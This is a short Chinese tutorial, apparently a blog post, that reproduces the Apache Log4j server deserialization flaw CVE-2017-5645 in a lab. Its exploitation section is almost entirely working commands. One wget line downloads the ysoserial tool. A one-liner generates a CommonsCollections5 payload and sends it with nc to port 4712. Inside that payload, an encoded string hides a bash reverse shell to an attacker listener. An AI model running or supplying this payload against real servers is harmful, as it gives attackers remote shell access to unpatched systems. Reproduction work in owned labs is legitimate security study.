Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

漏洞复现环境搭建请参考

http://t.csdnimg.cn/MxmId

漏洞版本

Apache Log4j 2.8.2之前的2.x版本

漏洞验证

(1)开放端口4712

漏洞利用

(1)ysoserial工具获取

python 复制代码
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

(2)base64加密反弹shell命令

(3)攻击机开启监听

(4)执行命令获取反弹shell

python 复制代码
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712
相关推荐
笑衬人心。6 分钟前
Ubuntu 22.04 + MySQL 8 无密码登录问题与 root 密码重置指南
linux·mysql·ubuntu
HMS Core1 小时前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
Gauss松鼠会1 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
chanalbert2 小时前
CentOS系统新手指导手册
linux·运维·centos
星宸追风2 小时前
Ubuntu更换Home目录所在硬盘的过程
linux·运维·ubuntu
热爱生活的猴子2 小时前
Poetry 在 Linux 和 Windows 系统中的安装步骤
linux·运维·windows
myloveasuka3 小时前
[Linux]内核如何对信号进行捕捉
linux·运维·服务器
m0_694845573 小时前
服务器需要备案吗?在哪些地区需要备案?
linux·运维·服务器·云计算
myloveasuka3 小时前
[Linux]内核态与用户态详解
linux
@BreCaspian3 小时前
在HP暗影精灵Ubuntu20.04上修复IntelAX211Wi-Fi不可用的全过程记录——系统安装以后没有WIFI图标&无法使用无线网
linux